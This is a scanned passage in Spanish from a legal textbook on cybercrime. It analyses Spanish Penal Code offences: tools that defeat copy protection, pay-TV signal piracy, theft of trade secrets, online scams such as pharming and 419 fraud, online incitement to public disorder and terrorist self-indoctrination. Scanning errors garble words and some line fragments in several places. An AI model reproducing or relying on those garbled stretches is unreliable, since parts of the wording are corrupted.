3.3. Los actos preparatorios en los delitos contra la propiedad intelectual


(art. 270.6 CP)
El art. 270.6 menciona específicamente como objeto de protección los
programas de ordenador castigando los siguientes actos preparatorios: po-
seer, fabricar, importar o poner en circulación medios para romper la protec-
ción de la supresión no autorizada o la neutralización de cualquier disposi-

- 260 -
Capítulo 6. CIBERCRÍMENES EN' NTID AMPLIO

1 vo técnico que se haya utilizado para proteg r programas de ordenador o


ualquiera de las otras obras, en los términos d el art. 270.1 y 2. Por lo tanto,
l objeto material no son las medidas tecnológicas en sentido estricto, sino
s medios o formas de suprimir o neutralizar dispositivos técnicos de pro-
cción. Son los mismos actos preparatorios que desde la reforma de 2003
encontraban sancionados en el art. 270.3 y que ahora ocupan este nue-
vo apartado, art. 270.6. El precepto castiga los actos preparatorios previos
las conductas de efectiva lesión de los derechos de propiedad intelectual y
frente a la anterior redacción del art. 270.3, la vigente reproduce de manera
xtraordinaria los arts. 102 y 160.2.c) del TRLPI, por lo que se produce el in-
deseable solapamiento entre la esfera penal y la civil.
Un elemento diferenciador entre el ilícito penal y el ilícito civil lo marca
la concurrencia de lo que en la dicción anterior del Código Penal era el ánimo
de lucro y ahora es la.finalidad comercial. La segunda diferencia que introdu-
ce la reforma de 2015 es la sustitución de la expresión medio específicamente
destinado por la de medio principalmente destinado, que provoca de nuevo una
ampliación del ámbito penal poco concreta y comprensible, si bien se ajusta a
la terminología utilizada por la Directiva 2001/29 /CE relativa a la armoniza-
ción de determinados aspectos de los derechos de autor y derechos afines en
la sociedad de la información. Probablemente el legislador ha querido cerrar la
posibilidad de que un dispositivo creado con esa función de inutilizar o neutra-
lizar el sistema de protección junto con otras utilidades añadidas, impidiera la
aplicación del tipo penal al no haberse concebido exclusivamente para ese pro-
pósito. En cualquier caso, el dictado sigue el tenor de la Directiva 2001/29 /CE.
Ej . 6.14: Integraría este delito la producción o distribución de cracks (crncking)
que violen los sistemas de protección de consolas de sobremesa tipo Nintendo a fin dt>
poder utilizar videojucgos piratas. También los cartuchos que pirateen videojuegos en
consolas portátiles. Asimismo, según Tnw>o EsTHADA (2016). quedarían incluidos en este
tipo dispositivos como los receptores FTA (free to Air) adaptados con un puerto R)-45 o
Ethernet, que permiten acceder a servicios de radiodifusión y televisión condicionada
(en cuyo caso se plantea un concurso de delitos entre el art. 270 y el 286) .

3.4. La piratería de servicios de comunicación y electrónicos ( art. 286 CP)


Quizás por no encontrarse ubicado en los delitos contra la propiedad in-
telectual, sino en el capítulo dedicado a los delitos relativos al mercado y a los
consumidores del mismo Título XIII, la doctrina no se muestra unánime en tor-
no al verdadero bien jurídico protegido por este precepto. Es cierto que, tanto
si reparamos en las conductas que enmarca como en el medio de ejecución y
los resultados, subsiste la duda, es decir, el bien jurídico objeto de protección
puede ser de carácter mixto, y según el supuesto concreto ante el que nos en-

- 261 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRíMENES EN PARTICULAR

contremos, podemos afirmar que atiende a los derechos de propiedad íntele


tual (en ese caso del servicio que ofrece los contenidos, que verá mermada su
capacidad de explotación económica de la prestación) y, en menor medida, lo
derechos relativos al mercado (la competencia) y a los consumidores.
En cualquier caso, la polémica está zanjada desde su expresa tipificación por
LO 15/2003 de reforma del CP, por lo demás eran conductas que intentaron, sin
éxito, encontrar encaje en las modalidades típicas del art. 270. Pero como veremos,
existen muchos supuestos que darán lugar a conflictos concursales, en especial con
los delitos defraudatorios y también con los relativos a la propiedad intelectual tras
la profunda reforma sufrida en 2015 por estos últimos.

La normativa de referencia para interpretar este artículo es la Directiva


98/84/CE, de 20 de noviembre de 1998, relativa a la protección jurídica de
los servicios de acceso condicional (previo pago) o basados en dicho acceso.
Son cuatro grupos que contienen una amplía variedad de conductas típicas
relativas a los intereses económicos de las entidades prestadoras de servicios
de comunicación y electrónicos, y pretenden responder al desafío de la incor-
poración masiva de sujetos a las TIC:
a) Facilitar el acceso inteligible a un servicio de radiodifusión sonora
o televisiva, o a servicios interactivos prestados a distancia por vía
electrónica, o suministrar el acceso a los mismos a través de diver-
sos medíos comísivos, siempre que exista finalidad comercial.
Ej. 6.15: Sistemas creados para piratear cadenas de televisión de
pago mediante tarjetas decodificadoras. Así, la técnica del cardsharing
consigue burlar a la seü.al por satélite ofreciendo claves válidas para deco-
dificar el contenido, aunque no se deba tener acceso por no ser abonado,
o el IKS (Internet Key Sharing) donde lo único que el usuario debe hacer es
actualizar el firmware del decodificador (ver Capítulo 2) facilitado direc-
tamente por el fabricante del aparato. Una vez actualizado y conectado al
satélíte y a la televisión, el aparato empieza a mostrar todos los contenidos
en abierto.

b) Alterar o duplicar el número ídentificativo de los equipos de tele-


comunicación, o comercializar equipos que hayan sido alterados de
forma fraudulenta, pero en este caso tiene que existir otro elemento
subjetivo distinto de la finalidad comercial -que es el interés econó-
mico en sentido estricto-, y sería el mero ánimo de lucro. Con esta
salvedad, no será aplicable a quienes lleven a cabo la conducta con
fines de sabotaje o terroristas, por ejemplo.
Ej. 6.16: La manipulación del PIN de un teléfono o su clonación.

- 262 -
Capítulo 6. CIBERCRÍMENES EN SENTIDO AMPLIO

c) Facilitar el acceso a los servicios descritos en el apartado a), pero


sin ánimo de lucro, o suministrar por medio de una comunicación
pública, comercial o no, información a una pluralidad de personas
sobre el modo de conseguir el acceso no autorizado a dichos servi-
cios, añadiendo en este caso otro elemento subjetivo, la incitación a
lograrlos, que significa que la conducta del sujeto debe estimular la
consecución del fin por parte de otros.
Ej. 6.17: Letizia, presidenta de la comunidad de propietarios de la
urbanización donde reside, alquila un aparato decodificador legítimo que
solo individualmente le permitía acceder a las emisiones codificadas de
Canal Plus, tras la firma de un contrato de prestación de servicio. Cono-
ciendo que ninguno de los 32 propietarios restantes disfruta de televisión
de pago. durante la celebración de la siguiente reunión de la Junta de pro-
pietarios, ofrece a estos el descodificador digital que le fue confiado para
uso individual y que, conectado a un equipo modulador, permite la redis-
tribución de la señal recibida de Canal Plus por la red de tocia la instala-
ción comunitaria, con lo que el resto de viviendas de la urbanización pue-
den acceder a la programación codificada. Como contraprestación, Letizia
no tendrá que abonar durante 9 meses el canon mensual de la comunidad
ele propietarios, cuyo importe será sufragado entre los demás vecinos.

El ejemplo es similar a los hechos probados relatados en Sentencia AP de Mur-


cia. núm. 52/2014, de 3 de febrero de 2014, que absuelve al sujeto, entre otros mo-
tivos, porque la conducta del art. 286.3 requiere el propósito de su autor d e obtener
un lucro, ventaja o beneficio económico. Este supuesto es reconducible al delito de
defraudación de fluido eléctrico y análogas del art. 255.

d) Utilizar los equipos o programas que permitan el acceso no autori-


zado a servicios de acceso condicional o equipos de telecomunica-
ción. En este caso, el delito es cometido en la modalidad de usuario
y la pena a imponer será la prevista en el art. 255 - relativo a los
delitos de defraudación de fluido eléctrico y análogas, con indepen-
dencia de la cuantía de lo defraudado.
Ej. 6.18: En el ejemplo anterior. esta sería la conducta ll evadu a cabo
por los vecinos de Letizia, pues disfrutan del acceso al servicio audiovisual
mediante el uso fraudulento del decodificador.

3.5. Otras disposiciones comunes


También se regula la responsabilidad penal de las personas jurídicas (art.
288), pero el régimen aplicable ha sufrido un cambio con la reforma de 2015
digno de mención. Consiste en que la expresión "beneficio obtenido o favorecí-

- 263 -
Ci bercriminalidad.
Tercera parte. LOS CIBERCIÚMENES EN PARTICULAR

do" que se debe tener en cuenta para el cálculo de la multa para la persona ju-
rídica, desaparece para dar paso a las disyuntivas de "beneficio obtenido o que
se hubiera podido obtener" o "beneficio obtenido, favorecido o que se hubiera
podido obtener" (en clara alusión al lucro cesante). Y esta distinción afecta a los
ciberdelitos contra la propiedad intelectual porque al desaparecer el término
"favorecido", emergen problemas en torno a cómo aplicar las penas previstas
en supuestos como el que contempla el art. 270.5 c), que precisamente tipifica
conductas de favorecimiento o facilitación (DE LA MATA BARRANCO, 2018).
Art. 270.5 c). "Serán castigados con las penas previstas en los apartados ante-
riores, en sus respectivos casos, quienes: Favorezcan o faciliten la realización de las
conductas a que se refieren los apartados 1 y 2 de este artículo eliminando o modi-
ficando, sin autorización de los titulares de los derechos de propiedad intelectual o
de sus cesionarios, las medidas tecnológicas eficaces incorporadas por éstos con la
finalidad de impedir o restringir su realización".

II. NUEVAS MODALIDADES DE COMISIÓN PARA DELITOS CLÁSICOS

l. Delitos contra la propiedad intelectual

Aunque el delito contra la propiedad intelectual, más allá de los tipos


específicos ya vistos, no es un ciberdelito en sentido estricto, sí puede come-
terse a través de Internet, especialmente en lo que se refiere a los plagios de
obras artísticas y a la comercialización de las mismas y de productos e inno-
vaciones industriales que el infractor puede bajarse de la Red (VELAsco NÚÑEz,
2011; MATA Y MARTÍN, 2012), constituyendo en estos casos un ciberdelito en
sentido amplio.
El art. 270 CP castiga a quien, para obtener un beneficio económico, di-
recto o indirecto, y en perjuicio de tercero reproduzca, plagie, distribuya, co-
munique públicamente o de cualquier otro modo explote económicamente,
en todo o en parte, una obra literaria, artística o científica en cualquier tipo de
soporte sin la autorización de los titulares de los correspondientes derechos
de propiedad intelectual o de sus cesionarios.
La misma conducta aparece regulada en el art. 20 del TRLPI, normativa a la
que se deberá acudir para la adecuada interpretación del delito. Asimismo, se prevé
extrapenalmente la existencia de una función de salvaguarda de los derechos en el
entorno digital. Sin embargo, la jurisprudencia ha reiterado (STS 876/2001, de 19
mayo; SAP Las Palmas 300/2014, de 28 noviembre) que el art. 270 CP no constituye
una ley penal en blanco que se remita a la normativa extrapenal, sino un complejo
punitivo, un tipo penal cerrado, integrado por variados elementos normativos que
es necesario precisar, en cada caso, acudiendo al auxilio de los técnicos y de los di-

- 264 -
Capítulo 6. CIBERCRÍMENES EN NTIDO AMPLIO

versos preceptos que regulan, en el campo civil y administrativo, la propiedad Inte-


lectual y del derecho de las comunicaciones

Por otra parte, también se castigan las conductas de exportación, impor-


tación o almacenamiento intencionado de ejemplares de las obras cuando
estuvieran destinadas a ser reproducidas, distribuidas o comunicadas públi-
camente; el favorecimiento o facilitación de la realización de las conductas
antes mencionadas, eliminando o modificando, sin autorización de los titu-
lares de los derechos de propiedad intelectual o de sus cesionarios, las medi-
das tecnológicas eficaces incorporadas por estos con la finalidad de impedir o
restringir su realización (medidas antipiratería); a quien, con la misma inten-
cionalidad lucrativa o facilitadora, eluda o facilite la elusión de las medidas
tecnológicas eficaces dispuestas para evitarlo; y, por último, a quien fabrique,
importe, ponga en circulación o posea con una finalidad comercial cualquier
medio principalmente concebido, producido, adaptado o realizado para fa -
cilitar la supresión no autorizada o la neutralización de cualquier disposi-
tivo técnico que se haya utilizado para proteger programas de ordenador o
cualquiera de las otras obras, interpretaciones o ejecuciones. Los dos últimos
puntos pueden considerarse meras conductas preparatorias para la realiza-
ción de los delitos contra la propiedad intelectual.
Ej. 6.19: La criminalidad organizada cibernética explota económicamen-
te la copia ilegal de música, películas cinematográficas, obras artísticas (sobre
todo pictóricas o gráficas que, por ejemplo, so n estam pactas en piezas textiles
como camisetas, etc.) obteniendo suculentos beneficios, y este surtido de ob-
jetos conforman el ataque a las dos manifestaciones ele los derechos sobre el
"ingenio" y la "creación", los delitos contra la propiedad intelectual e industrial.
Ahora bien, la mayoría de los que perfeccionan la venta ele estos productos en
la calle son personas inmigrantes en situación de irregularidad administrativa
que se ven abocadas a realizar este tipo de actividad debido, en gran parte, a la
situación ele exclusión social en la que se encuentran, puesto que no les ampa -
ran siquiera las normas ele derechos básicos y menos aún el derecho al trabajo,
por lo que encuentran sustento en la economía sumergida, y así se convierten
en personas muy vulnerables con un elevado riesgo ele ser objeto de explota-
ción por parte de las mafias y grupos organizados, ll evando a cabo la actividad
conocida como "top manta".

2. Descubrimiento y revelación de secretos de empresa


(ciberespionaje o snooping). Art. 278 CP

El delito está incluido en la rúbrica "delitos relativos al mercado y a los


consumidores", lo que indica que el bien jurídico protegido es, de modo pri-

- 265 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

maria, la defensa de la libre competencia y, con ello, la defensa de la empresa


frente a intromisiones ilícitas de otros competidores que puedan perjudicar
su posición en el mercado a través del conocimiento de datos reservados de
la propia empresa.
La protección del libre mercado corresponde en primera instancia al Derecho
civil, mercantil y administrativo, existiendo ilícitos (no penales) previstos en la nor-
mativa que regula dichos ámbitos (Ley de Propiedad Industrial, Ley de Patentes, Ley
de Marcas, Ley General de Publicidad, Ley sobre Competencia Desleal, Ley de Defensa
de la Competencia, etc.). Sin embargo, en nuestro ordenamiento penal se criminaliza-
ron conductas ya sancionadas en la Ley de Competencia Desleal; entre ellas, la reve-
lación de secretos y el espionaje industrial por lo que la relación entre ambas ha de
estar regida por el principio de intervención mínima y ultima ratio del orden jurisdic-
cional penal (SAP Barcelona de 28.11.2007; SAP Islas Baleares de 30.01.2018). El De-
recho penal en esta materia es tributario de la legislación extrapenal, a la que deberá
acudir a la hora de interpretar el bien jurídico protegido y los elementos de los delitos
de espionaje industrial. Nos encontramos, por tanto, ante leyes penales en blanco.

En el mundo actual, la información tiene un indudable valor económico


pero, además, también supone un verdadero valor estratégico, basado en los
conceptos de exclusividad y confidencialidad. Estos términos constituyen la
base sobre la que se cimienta hoy en día la competitividad industrial y que
tiene su epicentro en el denominado "secreto empresarial". El secreto empre-
sarial se basa en el interés de la empresa por mantener el monopolio de una
determinada situación de mercado. Su descubrimiento puede aumentar la
capacidad competitiva de los rivales o disminuir la propia capacidad.
En el art. 278 de nuestro vigente Código penal se castiga a quien, para
descubrir un secreto de empresa se apodere por cualquier medio de datos,
documentos escritos o electrónicos, soportes informáticos u otros objetos
que se refieran al mismo, o empleare alguno de los medios o instrumentos
señalados en el apartado 1 del artículo 197. Conducta que se agravará, siendo
castigada con mayor pena, si finalmente se difunden, revelen o cedan tales
datos. Además, al castigo se le podrán añadir las penas resultantes de los de-
litos de apoderamiento o daño en los soportes informáticos donde se encon-
traran esos datos (en concurso real de delitos).
Aunque este delito se encuentra, como veremos, intrínsecamente rela-
cionado con los ilícitos de descubrimiento y revelación de secretos, lo cierto
que es que su finalidad protectora va más allá del concepto de información
reservada. Nos referimos al secreto empresarial, uno de los conceptos fun-
damentales del delito de ciberespionaje industrial, también conocido como
snooping o robo de información, documentos y archivos. No obstante, como
veremos, el delito no se agota en su vertiente meramente industrial.

- 266 -
El Código penal no define lo que debemos entender por secreto empre-
sarial, pues se trata de un concepto mercantilista que no puede ser encorse-
tado en un listado numerus clausus. No obstante, en aras de una mayor se-
guridad jurídica, la doctrina y la jurisprudencia han tratado de definir este
concepto para su uso en materia penal y criminológica (concepto funcional y
práctico).
En principio serán secretos de empresa los propios de la actividad em-
presarial, que de ser conocidos contra la voluntad de la empresa, pueden
afectar a su capacidad competitiva (STS 285/2008, de 12 de mayo; AAP Ma-
drid 261/2019 de 29 marzo). Sus notas características son: la confidenciali-
dad (pues se quiere mantener bajo reserva), la exclusividad (en cuanto pro-
pio de una empresa), el valor económico (ventaja o rentabilidad económica),
y la licitud (la actividad ha de ser legal para su protección).
En cuanto a su concreto contenido material, el secreto empresarial como
objeto material del delito está integrado: por los secretos de naturaleza técni-
co industrial (objeto o giro de empresa); los de orden comercial (como clien-
tela, o marketing) y los organizativos (como las cuestiones laborales, de fun-
cionamiento y planes de la empresa).
Según la jurisprudencia se refiere a toda información relativa a la empresa que
es detentada con criterios de confidencialidad y exclusividad en aras a asegurarse
una posición óptima en el mercado frente al resto de las empresas competidoras,
en relación a los sectores industrial, comercial, relacionales y organizativos de la
empresa, es decir, aquellos conocimientos, técnicas, organización o estrategia que
no son conocidas fuera del ámbito empresarial (AAP Guipúzcoa 22/2007, de 19 fe-
brero; AAP Madrid 524/2005, de 16 mayo y STS 864/08, de 26 de diciembre; SAP
Barcelona 235/2018, de 26 marzo). Ha de estar relacionado con el tráfico mercantil
propio de la actividad de la empresa en cuestión, pero fuera de esta especificación
no se exige ninguna otra.

Tendrán el carácter de secretas las informaciones conocidas por un cír-


culo limitado de personas y oculto a otras. No bastaría la voluntad del empre-
sario de mantenerlas ocultas y para su exclusivo uso, si luego tales secretos
fueran intranscendentes, para el ámbito empresarial. En este particular de-
ben ir unidos un criterio subjetivo (voluntad del empresario de mantener lo
oculto) y un criterio objetivo (interés real y efectivo para la empresa).
Debe entenderse que la cartera de clientes se integrarla dentro del delito (SAP
Zaragoza 512/1999, de 3 de diciembre). Sin embargo, la jurisprudencia rechaza que
haya apoderamiento cuando las listas de clientes han sido elaboradas por los inves-
tigados o acusados durante los años de trabajo en la empresa (SAP Córdoba Sección
3, 48/2007, de 12 de marzo).

- 267 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

Ej. 6.20: El mero hecho de obtener fotografías en un lugar abierto al


público, como es un supermercado, y subirlas a la red no constituye infrac-
ción penal alguna. La pretensión de que podría constituir un delito contra
la propiedad industrial del art. 278.1 CP carece totalmente de consisten-
cia porque no se entiende qué secreto de empresa podría revelarse con la
toma de instantáneas en una zona de un supermercado abierta al público
(AAP Vizcaya 175 / 2006, de 6 marzo). Se trata de datos que no son reser-
vados y que podían fácilmente conocerse por terceros (STS 1607 /2000,
de 16 de febrero).

Como dispone el propio precepto, su materialización es compatible con


cualquier soporte, tanto papel como electrónico, de ahí que una de las moda-
lidades de comisión más frecuente sea a través de medios informáticos.
En cuanto al sujeto activo, aunque puede ser lo más habitual, para la co-
misión del tipo básico no es preciso que el autor descubra un secreto perte-
neciente a la empresa a la que pertenece o haya pertenecido (SAP Barcelona
1037 /2007, de 28 noviembre). En relación con el 278 estamos ante un delito
que puede cometer cualquier persona. Ha de ser cometido por quien no co-
noce el secreto y trata de descubrirlo (SSAP Sevilla 593 /2007, de 19 octu-
bre; Zaragoza 564/2008, de 16 octubre; Ciudad Real, de 17 de septiembre de
2012 y 151/2015 de 2 diciembre).
Estamos ante un delito de peligro y mera actividad. Es un delito de ca-
rácter tendencia!, pues la norma emplea la preposición "para" en el sentido
de "tener intención" de descubrir o revelar los secretos (tendencia interna
intensificada), de tal manera que si no se prueba esa intencionalidad la con-
ducta será impune.
Ej. 6.21 : La acción debe de estar presidida por la voluntad de descubri-
miento. Ello obliga a concluir que el apoderamiento desprovisto de la voluntad
de descubrimiento no es delictivo. Los descubrimientos fortuitos no se conside-
ran descubrimiento de secretos empresariales, por lo que el elemento subjetivo
del cielito cumple una función selectiva y restrictiva del apoderamiento.
Ej. 6.22 : La acción de apoderarse de un listado de clientes en soporte in-
formático y, con la información facilitada, remitir cartas ofertando un nuevo
servicio en otra empresa, ha de considerarse que cumple con los requisitos,
cualquiera que fuera la finalidad de segundo grado que con esta publicación se
pretendía (conseguir clientela fácil, venganza, ánimo de lucro, etc.).

Dado que la mayoría de las empresas en la actualidad almacenan y pro-


cesan su información en sistemas informáticos, el snooping, como método
particular para la comisión de un delito de descubrimiento y revelación de

- 268 -
Capítulo 6. CIBERCR1ME

secretos de empresa, consistirá en cu lq 1 que permita, por lo ge-


neral mediante la intrusión en el sistem 1 rpretación de sus comunica-
ciones, apoderarse de datos, documento hivos electrónicos que canten-
gan los secretos de empresa.
Ej. 6.23.: A principios de 2010 Google declaró que había sufrido un sofisti-
cado ataque cibernético mediante el que había siclo robada su propiedad inte-
lectual. El incidente se vinculó con una ola de ataques que, desde mediados ele
2009. habían sufrido grandes empresas tecnológicas de Estados Unidos. como
Microsoft. lntel, etc. Los atacantes se habían hecho con el código fuente ele im-
portantes productos de estas empresas introduciéndose en los ordenadores ele
personas relevantes en cada una de las compañías.

3. Estafas comunes a través de medios tecnológicos

Según el art. 248 de nuestro Código penal, cometen estafa los que, con
ánimo de lucro, utilizaren engaño bastante para producir error en otro, indu-
ciéndolo a realizar un acto de disposición en perjuicio propio o ajeno.
Los defraudadores tienen en Internet y las TIC un poderoso medio para
la comisión de determinadas estafas (FLORES MENDOZA, 2012). Aunque la ca-
suística es inabarcable, en este apartado nos referiremos a algunas de las más
conocidas.
En primer lugar, el llamado scam, es una combinación del phishing (véa-
se el epígrafe sobre este delito en este mismo capítulo) y el hoax (noticia falsa,
bulo), aunque, en realidad, este último elemento conforma el requisito que
dota de significado a las defraudaciones: el engaño. La estafa consiste en la
publicación de una información falsa en Internet, habitualmente una gran
oportunidad de negocio o la prestación de algún servicio, con apariencia de
realidad y que conforma el gancho para que la víctima se ponga en contacto
con el estafador a través de medios telemáticos. El siguiente paso será la pe-
tición de los datos bancarios de la víctima o la transferencia a través de una
entidad de envío de dinero, para cerrar el trato o realizar el pago del servicio
que se pretende contratar. En ningún caso se recibirá contraprestación o ser-
vicio alguno.
El término scammer es utilizado, en realidad, para referirse al cibercri-
minal que no realiza ninguna manipulación ni alteración en un sistema o soft-
ware, sino que lo que se produce es una suplantación respecto al verdadero
titular (por ejemplo, de datos bancarios), ya que el que introduce determina-
das claves afirma con ese acto ser determinada persona.

- 269 -
Cibercriminalidad.
Tercera parte. LOS CIBERCIÚMENES EN PARTICULAR

El pharming (farm significa granja en inglés y el origen del término ha


referencia al acceso a una granja de servidores o DNS) es un ataque puramen
te tecnológico cometido a través de la red que persigue la captura de clav
de acceso y firma del usuario en la entidad atacada. Consiste en la explotación
de una vulnerabilidad en el software de los servidores DNS (Domain Name
System) o en el de los equipos de los propios usuarios, que permite redirigir
un nombre de dominio a otra máquina distinta. Un usuario que introduzca
un determinado nombre de dominio que haya sido redirigido, accederá en su
explorador de Internet a la página web que el atacante haya especificado para
ese nombre de dominio y que usará el ciberdelincuente para estafarle, pues-
to que el usuario introducirá sus datos y claves (principalmente bancarios o
financieros) en la errónea convicción de estar en la página original, (VELASCO
NÚÑEZ, 2007; REY HUIDOBRO , 2012; ÉCIJA BERNAL, 2017) .
En cuanto a la "estafa nigeriana", o "timo 419", es una variante de la esta-
fa, realizada a través de medios informáticos, común entre los cibercriminales
ubicados en África. Tratan de lograr la disposición patrimonial de otras per-
sonas a través de un engaño, como decir a la víctima que le ha correspondido
un falso premio de lotería o informándole de fondos de dudosa o ilícita proce-
dencia supuestamente ocultos o abandonados por sus titulares (normalmente
fallecidos en un accidente aéreo), tras lo cual piden una aportación económica
previa de la víctima para retirar las cantidades de una supuesta depositaría o fi-
duciaria o rescatar los fondos (CALLE RoDRfGUEZ, 2007). Se promete una cantidad
muy grande de dinero a la víctima una vez que haya pagado algunos gastos "ne-
cesarios". A medida que el estafador intercambia mensajes con la víctima, se le
invita a esta constantemente a que efectúe el pago de otros gastos adicionales
antes de poder recibir los fondos prometidos. Este proceso continúa hasta que
la víctima deja de hacer los pagos (CPIC, 2018). Tras este tipo de estafas suelen
encontrarse auténticas organizaciones criminales muy complejas.
Ej. 6.24. : Mike, un estafador nigeriano de 40 años, logró embaucar a cien-
tos de víctimas en Internet y consiguió más ele 60 millones de dólares, 15,4 mi-
llones de una sola de sus víctimas. Encabezaba una red transnacional de unos
40 miembros en Nigeria, Malasia y Sudáfrica. Fue detenido por la Interpol con
la ayuda de las autoridades nigerianas en agosto ele 2016. Mike y sus cómpli-
ces fingían ser príncipes, herederos ricos o militares ele alto rango que querían
transferir urgentemente fondos fuera de su país y solicitaban la ayuda de sus
víctimas, junto con la promesa de recibir intereses. La solicitud puede adoptar
la forma de un anticipo de gastos (con el pretexto del pago de los honorarios de
los abogados, los derechos de aduana, los impuestos, etc.), pero también hacer-
se con los datos bancarios y los documentos de identidad de sus víctimas con
el pretexto de transferirles la suma, para después utilizar esos datos y acceder
directamente a las cuentas bancarias de los embaucados (CIPC, 2018 ).

- 270 -
Capítulo 6. CIBERCRÍMENES BN S NTIDO AMPLIO

Otra variante son los llamados "fraudes del CEO" (Business Email Com-
promise, o BEC), una evolución de las famosas estafas "nigerianas" adaptadas
al sector privado. El cibercriminal, a través de malware o técnicas de suplan-
tación o de ingeniería social, se hace con el control del email de un directivo
de la empresa. El fraude ocurre cuando un empleado autorizado para rea-
lizar pagos es engañado por el cibedelincuente para que pague una factura
falsa o realice una transferencia no autorizada de la cuenta comercial3. Son
las pequeñas y medianas empresas las que constituyen el principal objetivo,
representando el 38 % del volumen total de las empresas objetivo (NoRTON-
SYMANTEC, 2016).

En cuanto a la estafa de los novios, también conocida como de "la novia


rusa" o del "novio americano", se realiza a través de anuncios con links a pági-
nas web de perfiles o directamente mediante el envío de correos electrónicos,
o de perfiles falsos en redes sociales. La víctima comienza a recibir corres-
pondencia online con uno de los contactos, de cara a establecer una relación
sentimental. Una vez afianzado el contacto, el supuesto novio o novia solicita
fondos para realizar el viaje al encuentro con su amante. En realidad, la figura
del novio/a no es más que un alter ego del cibercriminal -avatar- frecuen-
temente integrado en una compleja organización criminal que, una vez ob-
tenido el dinero o recabados los datos bancarios de la víctima, no volverá a
contactar con ella.

4. Delito de provocación o complicidad psíquica con los desórdenes


públicos. Art. 559 CP

El art. 559 CP castiga la distribución o difusión pública, a través de cual-


quier medio, de mensajes o consignas que inciten a la comisión de alguno de
los delitos de alteración del orden público, o que sirvan para reforzar la deci-
sión de llevarlos a cabo. La conducta puede realizarse a través de las nuevas
TIC, por lo que la publicación de esta clase de consignas, que provoquen o
refuercen la decisión de cometer actos de violencia, en las redes sociales o
páginas web quedarían incluidas en este delito, siempre que se cumplan las
condiciones expuestas.
Se trata de un supuesto específico de provocación (acto preparatorio
punible) mediante la difusión por medios de publicidad. Las conductas que
se castigan son la incitación y también el refuerzo moral, animación o apoyo
a la realización de desórdenes públicos (ALONSO RIMo, 2015). El bien jurídico

3 Véase el documento de Europa! sobre el proceso de este fraude en: https: //www.eu-
ropol.europa.eu/ sites/default/files/ .. ./ie.pdf ( último acceso 07.08.2019) .

- 271 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRíMENES EN PARTICULAR

protegido en estos casos sería la tranquilidad o paz en las manifestaciones


colectivas de la vida ciudadana.
La fricción con el derecho a la libertad de expresión es patente, pues en
interpretación sistemática con los desórdenes públicos puede conducir a la
criminalización de la convocatoria de manifestaciones o reuniones públicas.
En este sentido, ha sido un precepto muy criticado pues puede suponer una
injerencia de los poderes públicos en las comunicaciones de las personas y
vulnerar, en el caso de los mensajes de teléfono móvil y los correos electróni-
cos, el secreto de las comunicaciones. Podría criminalizar la conducta de al-
guien que da una opinión o emite un mensaje lícito por la influencia que tiene
en un tercero, a quien ni siquiera se conoce. La técnica legislativa utilizada es
pobre, introduciendo conceptos tan genéricos que cualquier conducta puede
caber, ampliándose el ámbito de discrecionalidad: estamos hablando de men-
sajes difundidos por mail, sms, Twitter o Facebook, y en ese contexto es muy
peligroso usar el término incitación, que es ambiguo si tenemos en cuenta la
difusión de esta clase de medios telemáticos (No soMos DELITO, 2014).
Por ello debe realizarse una interpretación restrictiva del precepto.No de-
ben considerarse típicas la emisión de meros comentarios o juicios críticos o de
valor, o las convocatorias a través de medios tecnológicos de concentraciones o
actos de protesta social o política, sino que ha de existir una clara incitación a
realizar actos de violencia (LAMARCA PÉREZ, 2017). Si se producen actos de vio-
lencia deben quedar probados los elementos que permiten establecer una re-
lación directa entre la conducta del autor que publica los mensajes y los hechos
concretos (Juzgado de Instrucción núm. 14 de Barcelona, Auto de 10.07.2018).

5. Autoadoctrinamiento o autoadiestramiento terrorista. Art. 575.2 CP

El art. 575 CP regula un conjunto heterogéneo de conductas:


l. Será castigado con la pena de prisión de dos a cinco años quien, con la
finalidad de capacitarse para llevar a cabo cualquiera de los delitos tipificados en
este Capítulo, reciba adoctrinamiento o adiestramiento militar o de combate, o en
técnicas de desarrollo de armas químicas o biológicas, de elaboración o preparación
de sustancias o aparatos explosivos, inflamables, incendiarios o asfixiantes, o espe-
cíficamente destinados a facilitar la comisión de alguna de tales infracciones.
2. Con la misma pena se castigará a quien, con la misma finalidad de capaci-
tarse para cometer alguno de los delitos tipificados en este Capítulo, lleve a cabo por
sí mismo cualquiera de las actividades previstas en el apartado anterior.
Se entenderá que comete este delito quien, con tal finalidad, acceda de ma-
nera habitual a uno o varios servicios de comunicación accesibles al público en lí-

- 272 -
Capítulo 6. CIBERCIUMENES EN SENTIDO AMP

nea o contenidos accesibles a través de intern t d un rvl I d omunlca Ion s


electrónicas cuyos contenidos estén dirigidos o r sult n Idóneos para Incitar a la
incorporación a una organización o grupo terro rista, o a colaborar con cualquiera
de ellos o en sus fines. Los hechos se entenderán cometidos en España cuando se
acceda a los contenidos desde el territorio espafiol.
Asimismo, se entenderá que comete este delito quien, con la misma finalidad,
adquiera o tenga en su poder documentos que estén dirigidos o, por su contenido,
resulten idóneos para incitar a la incorporación a una organización o grupo terro-
rista o a colaborar con cualquiera de ellos o en sus fines.

Según el nº 2 del precepto se entiende que comete el delito de autoadoctri-


namiento o autoadiestramiento terrorista quien, con la finalidad de capacitar-
se para cometer un delito terrorista acceda de manera habitual a uno o varios
servicios de comunicación accesibles al público en línea o contenidos accesi-
bles a través de Internet o de un servicio de comunicaciones electrónicas cuyos
contenidos estén dirigidos o resulten idóneos para incitar a la incorporación a
una organización o grupo terrorista, o a colaborar con cualquiera de ellos o en
sus fines. Y también quien posea documentos dirigido o idóneos para incitar a
la integración en, o la colaboración con organización terrorista.
Ej. 6.25.: Con ocasión de su detención. a la acusada Fátima le fueron incau-
tados los siguientes efectos: un teléfono de la marca Samsung el cita! contenía
conversaciones de ella y de su esposo con los hermanos de este último, en las
que apoyaban y alentaban las actividades de la organización terrorista interna-
cional DAESH-Estado Islámico y sus miembros, así como vídeos y fotografías de
las acciones y militantes de dicha organización terrorista. El tribunal condenó a
Fátima por un delito de autoadoctrinamiento, al considerar probado que los ví-
deos relativos a la organización terrorista que poseía estaban destinados "a ins-
truirse en su perverso credo e incitar a su integración en ella" (STS 661/2017,
de 10 octubre).

Las nuevas formas de captación o de aprendizaje que facilitan las redes


sociales, páginas web, blogs y las TIC son frecuentemente utilizadas por or-
ganizaciones terroristas de corte yihadista. Este tipo penal tiene la finalidad
de impedir que las organizaciones terroristas cuenten con un sustrato de
